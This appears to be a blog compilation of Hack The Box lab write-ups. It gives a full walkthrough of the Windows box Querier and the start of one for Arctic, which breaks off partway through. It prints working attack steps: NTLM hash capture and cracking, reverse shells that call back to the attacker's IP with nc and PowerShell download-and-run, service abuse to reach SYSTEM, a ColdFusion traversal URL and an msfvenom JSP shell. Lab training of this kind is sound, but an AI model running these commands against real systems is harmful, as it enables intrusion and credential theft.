HTB – Querier

Today we are going to solve another CTF challenge “Querier” which is lab presented by Hack the Box for making online penetration practices according to your experience level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab, therefore, we have chosen retired Querier lab.

Level: Beginners

Task: find user.txt and root.txt file in the victim’s machine.

Let’s  start with a basic nmap scan

root@kali:~/htb/QUERIER# nmap -sT -p- -oA nmap-alltcp 10.10.10.125
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-03 07:39 EDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Nmap scan report for QUERIER.HTB.LOCAL (10.10.10.125)
Host is up (0.036s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 21.00 seconds

nmap gives some interesting Windows services: SMB (135/139/445), MSSQL (1433), WinRM (5985):

SMB

Null Session Enumeration

smbmap doesn’t show anything with a null session:

root@kali# smbmap -H 10.10.10.125
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.125...
[+] IP: 10.10.10.125:445        Name: 10.10.10.125
        Disk                                                    Permissions
        ----                                                    -----------
[!] Access Denied

And the trick I learned from ippsec does work:

root@kali:~/htb/QUERIER# smbmap -H 10.10.10.125 -u anonymous -d localhost
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.125...
[+] IP: 10.10.10.125:445 Name: QUERIER.HTB.LOCAL 
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ READ ONLY
Reports READ ONLY

alternatively smbclient can be used:

root@kali# smbclient -N -L //10.10.10.125

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Reports         Disk
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available       

Most interesting is the share named reports.

File

I can connect to this share, and there’s a single .xlsm file. I’ll grab a copy and exit:

root@kali# smbclient -N //10.10.10.125/Reports
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 28 18:23:48 2019
  ..                                  D        0  Mon Jan 28 18:23:48 2019
  Currency Volume Report.xlsm         A    12229  Sun Jan 27 17:21:34 2019

                6469119 blocks of size 4096. 1585533 blocks available
smb: \> get "Currency Volume Report.xlsm"
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (92.6 KiloBytes/sec) (average 92.6 KiloBytes/sec)
smb: \> exit   

Analysis of Currency Volume Report.xlms

.xlms is a Microsoft Excel workbook with macros. I could take this over to a Windows host and open it, but a tool like olevba (part of oletools) will give me the VBA on my Linux machine:

root@kali# olevba Currency\ Volume\ Report.xlsm
olevba 0.53.1 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OpX:M-S-H--- Currency Volume Report.xlsm
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: u'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

' macro to pull data for client volume reports
'
' further testing required

Private Sub Connect()

Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

If conn.State = adStateOpen Then

  ' MsgBox "connection successful"

  'Set rs = conn.Execute("SELECT * @@version;")
  Set rs = conn.Execute("SELECT * FROM volume;")
  Sheets(1).Range("A1").CopyFromRecordset rs
  rs.Close

End If

End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
+------------+-------------+-----------------------------------------+
| Type       | Keyword     | Description                             |
+------------+-------------+-----------------------------------------+
| Suspicious | Open        | May open a file                         |
| Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
|            |             | be used to obfuscate strings (option    |
|            |             | --decode to see all)                    |
+------------+-------------+-----------------------------------------+

The most interesting part there is the code the sets up the database connection:

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

From this, I can get a username (“reporting”) and password (“PcwTWTHRwryjc$c6”) to connect.

MSSQL

Connect

Armed with a username and password, I can connect with mssqlclient.py. I’ll make sure to use the -windows-auth flag, and I’m connected:

root@kali# mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>

Enumerate

Once connected, I can check out the database. I can see my current user’s permissions:

SQL> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name    subentity_name    permission_name
------------   ---------------   ------------------
server                           CONNECT SQL
server                           VIEW ANY DATABASE

I can check out the databases available:

SQL> SELECT name FROM master.sys.databases
name
-----------
master
tempdb
model
msdb
volume

I can look for user generated tables on those databases:

SQL> use volume
[*] ENVCHANGE(DATABASE): Old Value: volume, New Value: volume
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
SQL> SELECT name FROM sysobjects WHERE xtype = 'U'
name
------------    

Unfortunately, I don’t find much of interest.

Database Privesc: reporter –> mssql-svc

Capture Net-NTLMv2

Background

In the box that Querier replaced, Giddy, there was an SQL injection in a SQL Server instance where I used the xp_dirtree command to get it to connect to me over SMB where I was listening with responder to capture the Net-NTLMv2. (note posts on ntlmv2 and giddy). I’ll do the same thing here, just with direct access instead of SQLi.

I’ll use xp_dirtree to load a file, and I’ll tell the db that the file is in an SMB share on my hosts. The server will try to authenticate to my host, where responder will collect the Net-NTLMv2. For more details, check out the [Giddy writeup] and/or [my post on Net-NTLMv2].

xp_dirtree / responder

I’ll start responder:

root@kali# responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 2.3.3.9

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CRTL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.14]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']



[+] Listening for events...

Next, I’ll issue the connect to load a file using xp_dirtree from an SMB share (that doesn’t exist) on my host:

SQL> xp_dirtree '\\10.10.14.14\a';
subdirectory    depth
-------------   -----------

It doesn’t return anything, but in the responder window, I’ve captured the necessary information:

[SMBv2] NTLMv2-SSP Client   : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMBv2] NTLMv2-SSP Hash     : mssql-svc::QUERIER:603386f497f98c33:CDE796E771AA42296023CFE3DF531FD7:0101000000000000C0653150DE09D201C1D5449F39E6185B000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000237D06AB3470A72BFB64FBDC7EE605FD85661EA58867468F6B9360642BBC52DD0A001000000000000000000000000000000000000900200063006900660073002
F00310030002E00310030002E00310034002E0031003400000000000000000000000000
[*] Skipping previously captured hash for QUERIER\mssql-svc

Crack Net-NTLMv2

Over to hashcat where I’ll try to brute force the password. I can find the hash type here or with a simple grep on the help page:

$ hashcat -h | grep -i netntlmv2
   5600 | NetNTLMv2                                        | Network Protocols

Now crack it:

$ hashcat -m 5600 mssql-svc.netntlmv2 /usr/share/wordlists/rockyou.txt -o mssql-svc.netntlmv2.cracked --force
hashcat (v4.0.1) starting...
...[snip]...

$ cat mssql-svc.netntlmv2.cracked
MSSQL-SVC::QUERIER:603386f497f98c33:cde796e771aa42296023cfe3df531fd7:0101000000000000c0653150de09d201c1d5449f39e6185b000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c0003003400570049004e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d20106000400020000000800300030000000000000000000000000300000237d06ab3470a72bfb64fbdc7ee605fd85661ea58867468f6b9360642bbc52dd0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003400000000000000000000000000:corporate568

Log in as mssql-srv

Armed with the username “mssql-src” and password “corporate568”, I can now log in with the new creds:

root@kali# mssqlclient.py mssql-svc:'corporate568'@10.10.10.125 -windows-auth
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> 

Shell as mssql-svc

Enumeration

With access to the mssql-svc account, I have a lot more privilege on the database:

SQL> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name     subentity_name     permission_name
-------------   ----------------   --------------------------------
server                             CONNECT SQL                                                            
server                             SHUTDOWN                                                               
server                             CREATE ENDPOINT                                                        
server                             CREATE ANY DATABASE                                                    
server                             CREATE AVAILABILITY GROUP                                              
server                             ALTER ANY LOGIN                                                        
server                             ALTER ANY CREDENTIAL                                                   
server                             ALTER ANY ENDPOINT                                                     
server                             ALTER ANY LINKED SERVER                                                
server                             ALTER ANY CONNECTION                                                   
server                             ALTER ANY DATABASE                                                     
server                             ALTER RESOURCES                                                        
server                             ALTER SETTINGS                                                         
server                             ALTER TRACE                                                            
server                             ALTER ANY AVAILABILITY GROUP                                           
server                             ADMINISTER BULK OPERATIONS                                             
server                             AUTHENTICATE SERVER                                                    
server                             EXTERNAL ACCESS ASSEMBLY                                               
server                             VIEW ANY DATABASE                                                      
server                             VIEW ANY DEFINITION                                                    
server                             VIEW SERVER STATE                                                      
server                             CREATE DDL EVENT NOTIFICATION                                          
server                             CREATE TRACE EVENT NOTIFICATION                                        
server                             ALTER ANY EVENT NOTIFICATION                                           
server                             ALTER SERVER STATE                                                     
server                             UNSAFE ASSEMBLY                                                        
server                             ALTER ANY SERVER AUDIT                                                 
server                             CREATE SERVER ROLE                                                     
server                             ALTER ANY SERVER ROLE                                                  
server                             ALTER ANY EVENT SESSION                                                
server                             CONNECT ANY DATABASE                                                   
server                             IMPERSONATE ANY LOGIN                                                  
server                             SELECT ALL USER SECURABLES                                             
server                             CONTROL SERVER  

xp_cmdshell

It still won’t let me run xp_cmdshell, the command to run commands:

SQL> xp_cmdshell whoami
[-] ERROR(QUERIER): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

Note, the actual syntax to run a command is EXEC xp_cmdshell '[command]';. However, the client I’m using to connect, mssqlclient.py has a build in command to run a command over xp_cmdshell, so I can just type xp_cmdshell [command].

As mssql-svc, I can enable xp_cmdshell (something I couldn’t do as reporting). Just like running a command, there is an alias to do this in the script. The full commands are (from Microsoft’s documentation):

-- To allow advanced options to be changed.  
EXEC sp_configure 'show advanced options', 1;  
GO  
-- To update the currently configured value for advanced options.  
RECONFIGURE;  
GO  
-- To enable the feature.  
EXEC sp_configure 'xp_cmdshell', 1;  
GO  
-- To update the currently configured value for this feature.  
RECONFIGURE;  
GO

The shell’s alias works:

SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
querier\mssql-svc
NULL

Shell

To get a full shell on the box, there are many ways to go. I’ll host nc on an smb server, and let windows run it from there.

Start my smb server:

root@kali# ls smb/
nc64.exe
root@kali# smbserver.py -smb2support a smb/
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

I’ll also start a nc listener on port 443. Then I’ll tell the Windows box to run it from the share:

SQL> xp_cmdshell \\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 443
output                                                            
--------------------------------------------------------------------------------
NULL  

In the nc window (remember to rlwrap for arrow key support):

root@kali# rlwrap nc -lnvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.125.
Ncat: Connection from 10.10.10.125:49683.
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Alternatively:

SQL> exec xp_cmdshell "PowerShell IEX(IWR('http://10.10.14.7/puckieshell443.ps1'))" 
root@kali:~/htb/QUERIER# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.125 - - [03/Jul/2019 08:44:40] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
root@kali:~/htb/QUERIER# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.125.
Ncat: Connection from 10.10.10.125:49678.
Windows PowerShell running as user mssql-svc on QUERIER
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami 
querier\mssql-svc
PS C:\Windows\system32> type C:\Users\mssql-svc\Desktop\user.txt
c37*****3c16

Privesc: mssql-svc –> Administrator

Enumeration

One of the best enumeration scripts for Windows is PowerUp.ps1 from PowerSploit. To run it here, I’ll make a copy of it in the smb share:

root@kali# cp /opt/PowerSploit/Privesc/PowerUp.ps1 smb/

The nc shell is stable enough to load an interactive PowerShell session:

C:\Users\mssql-svc\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\mssql-svc\Desktop> whoami
querier\mssql-svc

Windows sometimes has issues loading PowerShell scripts off of file shares, but I can move to temp, copy the file there, and then import it:

PS C:\Users\mssql-svc\Desktop> cd ..\appdata\local\temp

PS C:\Users\mssql-svc\appdata\local\temp> xcopy \\10.10.14.14\a\PowerUp.ps1 .
xcopy \\10.10.14.14\a\PowerUp.ps1 .
\\10.10.14.14\a\PowerUp.ps1
1 File(s) copied

PS C:\Users\mssql-svc\appdata\local\temp> . .\PowerUp.ps1
. .\PowerUp.ps1

Now I can run it with Invoke-AllChecks:

PS C:\Users\mssql-svc\appdata\local\temp> Invoke-AllChecks

Privilege   : SeImpersonatePrivilege
Attributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2212
ProcessId   : 192
Name        : 192
Check       : Process Token Privileges

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True
Name          : UsoSvc
Check         : Modifiable Services

ModifiablePath    : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

UnattendPath : C:\Windows\Panther\Unattend.xml
Name         : C:\Windows\Panther\Unattend.xml
Check        : Unattended Install Files

Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group
            Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Check     : Cached GPP Files

Alternatively use

PS C:\users\public> IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.7/powerup.ps1')
[*] Running Invoke-AllChecks
...

There’s a ton of interesting stuff in here, and I’ll spend some time on each of these in Beyond Root. For now, I’ll jump on the most obvious result, the GPP password file with the username / password combination of “Administrator” / “MyUnclesAreMarioAndLuigi!!1!”.

Administrator Shell

With the administrator account password, a shell is pretty simple. I’ll use wmiexec:

root@kali# wmiexec.py 'administrator:MyUnclesAreMarioAndLuigi!!1!@10.10.10.125'
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
querier\administrator

From there, root.txt is simple:

C:\users\administrator\desktop>type root.txt
b19c3794...

Beyond Root

Overview of results

PowerUp showed five potential paths to SYSTEM:

  • SeImpersonatePrivilege
  • Modifiable Service – UsoSvc
  • %PATH% .dll Hijacks
  • Unattended Install Files
  • Cached GPP Files

I used the last one to get Administrator access in the main write up, as it simply provided the administrator credentials, and it’s pretty easy to understand.

I’ll take a look at the other four results.

RIP Juicy Potato

It seems like Microsoft may have fixed the path from SeImpresonate to SYSTEM in Server 2019, and that’s what this host is:

PS C:\Users\mssql-svc\Desktop> gwmi win32_operatingsystem | % caption
Microsoft Windows Server 2019 Standard 

So this is a dead end.

Unattended Install Files

Jumping to the fourth item, there can be passwords in unattended.xml files. Unfortunately for me, not in these:

PS C:\windows\panther> type unattend.xml | findstr /i password
type unattend.xml | findstr /i password
     <Password>*SENSITIVE*DATA*DELETED*</Password>
       <Password>*SENSITIVE*DATA*DELETED*</Password>

Modifiable Service Abuse

One thing that Invoke-AllChecks runs is the Get-ModifiableService commandlet. It:

Enumerates all services and returns services for which the current user can modify the binPath.

This is what produced the following output when I ran Invoke-AllChecks above:

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True
Name          : UsoSvc
Check         : Modifiable Services

They suggest running Invoke-ServiceAbuse. I’ll take a look at the source for this function. It will enable the service (if it isn’t already enabled), and backup the current service binary. It will then set the service to run the input commands, run the service, wait, then stop the service,

PS C:\users\public> Restart-Service UsoSvc

and restore the original binary.

PS C:\Users\mssql-svc\AppData\Local\Temp> Invoke-ServiceAbuse -Name 'UsoSvc' -Command "\\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 443"                                                                                                 
Invoke-ServiceAbuse -Name 'UsoSvc' -Command "\\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 443"

ServiceAbused Command
------------- -------
UsoSvc        \\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 443

And get a shell as SYSTEM:

root@kali# nc -lvnp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.125.
Ncat: Connection from 10.10.10.125:49682.
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

However, because the script is made to run commands and then stop the service, it dies quickly (even if it tried to leave them going, nc64.exe isn’t a service binary so it would die very quickly). I could use msfvenom to create a service binary, or I can just have the first shell execute nc again. That new ncprocess will live on even after it’s parent has died:

root@kali# nc -lvnp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.125.
Ncat: Connection from 10.10.10.125:49686.
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>\\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 444
\\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 444

I could also have had the PowerUp command add an admin user, or schedule a task to run nc and connect back to me every minute. Both of those commands would run and finish quickly, without issue.

.dll Hijack

Invoke-AllChecks also runs Find-PathDLLHijack, which:

Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath to return the folder paths the current user can write to.

The run on Querier returned:

ModifiablePath    : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

It’s saying that that I can write to the dll at the location in AppData. The problem is, I don’t have a good way to then restart a service or anything else that will use this dll and is running as administrator or system, so it’s a dead end for HTB.

Manual Exploitation (Group Policy Preference Password Finder)

In order to exploit this issue manually it is needed to manually browse to the Groups.xml file which is stored in a shared directory in the domain controller and obtain the value of the attribute cpassword.

PS C:\programdata> cmd.exe /c "dir /s /b |findstr Group" 
C:\programdata\Microsoft\Group Policy
C:\programdata\Microsoft\Group Policy\Trace
C:\programdata\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}
C:\programdata\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine
C:\programdata\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences
C:\programdata\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups
C:\programdata\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml

PS C:\programdata> get-content "C:\programdata\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml"
<?xml version="1.0" encoding="UTF-8" ?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1">
<Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties></User></Groups>
PS C:\programdata> 

Then this value can be passed into another tool which can decrypt the value.

c:\PENTEST>gp3finder.exe

Group Policy Preference Password Finder (GP3Finder) $Revision: 4.0 $
Copyright (C) 2015 Oliver Morton (Sec-1 Ltd)
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See GPLv2 License.

Specify: encrypt, decrypt or auto.
usage: gp3finder.exe [-h] [-D DECRYPT | -E ENCRYPT | -A] [-l] [-lr LOCAL_ROOT]
[-rr REMOTE_ROOT] [-o OUTFILE] [-t HOSTS [HOSTS ...] | -f
FILE] [-v] [-V] [-u USER] [-s SHARE]

c:\PENTEST>gp3finder.exe -D CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ

Group Policy Preference Password Finder (GP3Finder) $Revision: 4.0 $
Copyright (C) 2015 Oliver Morton (Sec-1 Ltd)
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See GPLv2 License.

MyUnclesAreMarioAndLuigi!!1!

reference used : https://0xdf.gitlab.io/2019/06/22/htb-querier.html

HTB – Arctic

Today we are going to solve another CTF challenge “Arctic” which is categories as retried lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy until you don’t have some knowledge of vulnerability assessment. Let start and learn how to analyze any vulnerability in a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file in the victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Arctic is 10.10.10.11 so let’s initiate with nmap port enumeration.

c:\Users>jacco\nmap -sC -sV 10.10.10.11
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-19 19:46 W. Europe Summer Time
Nmap scan report for 10.10.10.11
Host is up (0.033s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.40 seconds

Right off the bat port 8500 looks interesting. Let’s have a look in the browser.

8500

CFIDE

The administrator directory gives us a login for ColdFusion 8.

Login

Exploitation

After a quick search online we find that ColdFusion 8 is vulnerable to directory traversal. ColdFusion 8 also stores the administrator hash locally in a file called password.properties. So we can grab the administrator hash using the directory traversal using the following URL:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

And we get this output in the browser.

HASH

So we have a hash of 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

Using hash-identifier we see the hash is most likely SHA-1.

root@kali:~/htb/arctic# hash-identifier
   #########################################################################
   #	 __  __ 		    __		 ______    _____	   #
   #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
   #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R #
   #							www.Blackploit.com #
   #						       Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

Possible Hashs:
[+]  SHA-1

A quick Google search online yields the cracked password – happyday. Usually easiest to start here before firing up hashcat.

Inside of the login page there is an area that allows us to upload files via Scheduled Tasks under the Debugging & Logging Category.

ADMIN

The scheduled task setup gives you the ability to download a file from a webserver and save the output locally. Under Mappings, we can verify the CFIDE path, so we know where we can save a shell.

MAPPINGS

At this point we need to generate a shell. We could upload a cfexec.cfm shell (located in /usr/share/webshells/cfm on Kali) to get command execution or we can get a full shell by uploading a JSP shell since ColdFusion will serve and run JSP files.

To generate a JSP shell, we use msfvenom and set our parameters accordingly.

root@kali:~/htb/arctic# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell.jsp
Payload size: 1496 byte

Now that we have our shell created let’s serve up the file from Kali using a python SimpleHTTPServer

root@kali:~/htb/arctic# python -m SimpleHTTPServer 80
